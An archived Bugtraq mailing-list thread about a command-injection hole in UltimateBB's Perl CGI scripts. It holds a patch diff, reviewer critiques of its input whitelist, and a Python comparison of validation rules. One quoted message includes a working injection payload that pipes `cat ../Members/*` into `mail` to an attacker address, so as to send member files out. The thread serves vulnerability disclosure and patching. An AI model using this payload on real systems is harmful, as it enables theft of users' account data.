According to the folks at UBB, the latest version, 5.43d, fixes this vulnerability. Has anyone been able to verify if this is in fact correct?

Irwin

> -----Original Message-----
> From: Jordan Ritter [mailto:jpr5at_private]
> Sent: Tuesday, February 15, 2000 8:48 PM
> To: BUGTRAQat_private
> Subject: Re: perl-cgi hole in UltimateBB by Infopop Corp.
>
>
> On Mon, 14 Feb 2000, Kevin Hillabolt wrote:
>
> # It works on the full version also...
> #
> # Little different syntax:
> # topic=012345.cgi|cat%20../Members/*|mail hackerat_private|
> # (note the ../ on the Members. You have to go up a directory to get the
> # file. Maybe you could stop it via simple folder permissions??)
>
> Provided with no warranty. unescape() borrowed from the far superior CGI.pm. It appears to work, but I haven't checked it for completeness.
>
> The ubb scripts are a programming disaster, and pass around metachars and filenames through form parameters, making input validation difficult. The patch below selectively validates input based on the name of the variable we're validating (i.e. only certain variables are dangerous; others are just dumb and not a risk). It's better to try and validate at the top level than code review the source and try to patch every idiotic mistake that was made. At the very least, this stops the specific attack that was posted. There could be other holes that this doesn't cover, or alternative ways to carry out the same attack. Hopefully Infopop will get their act together soon.
>
> I can't believe they distribute this crap as commercial software. Actually, what I can't believe is how many people paid for it. God help us all.
>
> --jordan
>
> $ diff ubb_library.pl ubb_library.pl.orig
> 84,93d83
> < # unescape URL-encoded data
> < sub unescape {
> < shift() if ref($_[0]);
> < my $todecode = shift;
> < return undef unless defined($todecode);
> < $todecode =~ tr/+/ /; # pluses become spaces
> < $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;
> < return $todecode;
> < }
> <
> 1047a1038
> >
> 1112,1120d1102
> < # clean input
> < if ($key =~ /^(forum|topic|number|replynum)$/i) {
> < my($newval) = &unescape($val);
> <
> < if ($newval !~ /^([ -\@\w.]+)$/) {
> < $val = "bad_input";
> < }
> < }
> <
> 1266,1284d1247
> <
> < my(@out);
> < foreach $row (@in) {
> < my($name,$value) = split ("=", $row);
> <
> < if ($name =~ /^(forum|topic|number|replynum)$/i) {
> < my($newvalue) = &unescape($value);
> <
> < if ($newvalue !~ /^([ -\@\w.]+)$/) {
> < $value = "bad_input";
> < }
> <
> < push @out, "$name=$value";
> < } else {
> < push @out, $row;
> < }
> < }
> < @in = @out;
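Review bot: the diff direction is reversed in the `84,93d83` hunk (and the rest of the patch): it was produced as `diff ubb_library.pl ubb_library.pl.orig`, patched file first, so every `<` line is code being added to the fixed script even though the `d` hunk headers read as deletions. Anyone feeding this to `patch` as-is would strip the fix rather than apply it; either swap the arguments (`diff ubb_library.pl.orig ubb_library.pl`) or state the direction next to the patch, and prefer `diff -u` so the new `unescape` lands at line 84 with surrounding context instead of bare line numbers that will not match other 5.4x revisions.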
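Review bot: the whitelist in the `1112,1120d1102` hunk, `/^([ -\@\w.]+)$/`, is looser than it looks. ` -\@` is a character range from space (0x20) to `@` (0x40), so besides `\w` and `.` it still admits `/`, `;`, `&`, `$`, `(`, `)`, `<`, `>`, `*` and the other punctuation in that range; of the posted payload only the `|` falls outside it, and a value such as `../Members` still passes. Since `topic` and `number` values look like `012345.cgi`, a class limited to `[\w.]` would reject the traversal and the remaining metacharacters; and because `$` matches before a trailing newline, the anchor should be `\z` so `%0A` at the end of a value cannot slip past the check. Note also that `$val` is left in its still-encoded form after validation, which is fine only as long as the later code unescapes it exactly as `unescape()` does here.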
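Review bot: in the `1266,1284d1247` hunk, `split ("=", $row)` has no field limit, so a raw `=` in the value part of a pair yields a third field that is discarded and the rebuilt `"$name=$value"` silently truncates the parameter; `split(/=/, $row, 2)` keeps the whole value for the whitelist test (where the same ` -\@` range concern applies). The hunk header announces 19 lines (1266 through 1284) but only 18 `<` lines are present, so a line, most likely a blank one, was lost in the mail; a regenerated `diff -u` would make that visible and let readers apply the hunk cleanly.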
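As an added example (not part of the thread, and not Infopop's or the patch author's code), here is the quoted patch's validation rule translated to Python beside a tighter whitelist, so a reader can see which characters the patch's `/^([ -\@\w.]+)$/` class actually lets through and why the anchor matters. The parameter names and the first regex come from the diff; `STRICT_OK`, the function names and the sample values are this example's own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Parameter names the quoted patch treats as dangerous (taken from the diff).
DANGEROUS = re.compile(r"^(forum|topic|number|replynum)$", re.IGNORECASE)

# The patch's whitelist, translated from Perl. The class " -@" is a range
# from space (0x20) to "@" (0x40), so it admits all punctuation in that
# range, and "$" still matches before a trailing newline.
PATCH_OK = re.compile(r"^([ -@\w.]+)$", re.ASCII)

# A tighter rule (this example's assumption, not something the thread
# proposes): word characters and dots only, anchored with \Z so a value
# ending in an encoded newline cannot pass.
STRICT_OK = re.compile(r"^[\w.]+\Z", re.ASCII)


def validate(name, value, pattern=PATCH_OK):
    """Mirror the patch: decode the value, test the decoded form against the
    whitelist, and return the original (still-encoded) value or "bad_input".
    Parameters not in DANGEROUS pass through untouched, as in the patch."""
    if not DANGEROUS.match(name):
        return value
    decoded = unquote_plus(value)          # same job as the patch's unescape()
    return value if pattern.match(decoded) else "bad_input"


def admitted_punctuation(pattern):
    """Return the printable ASCII punctuation (0x21-0x7E, non-alphanumeric)
    that the given whitelist accepts as a complete value."""
    return "".join(ch for ch in map(chr, range(0x21, 0x7F))
                   if not ch.isalnum() and pattern.match(ch))


if __name__ == "__main__":
    # Constructed sample values; the first is the shape of a normal topic id.
    for value in ("012345.cgi", "../Members", "012345.cgi%0A"):
        print(f"{value!r:22} patch={validate('topic', value)!r:22} "
              f"strict={validate('topic', value, STRICT_OK)!r}")
    print("patch whitelist admits: ", admitted_punctuation(PATCH_OK))
    print("strict whitelist admits:", admitted_punctuation(STRICT_OK))
```

Running it shows the patch accepting `../Members` and the newline-terminated value while the stricter class rejects both; the `admitted_punctuation` listing is the quickest way to audit any such character-class whitelist before shipping it.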
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:36:01 PDT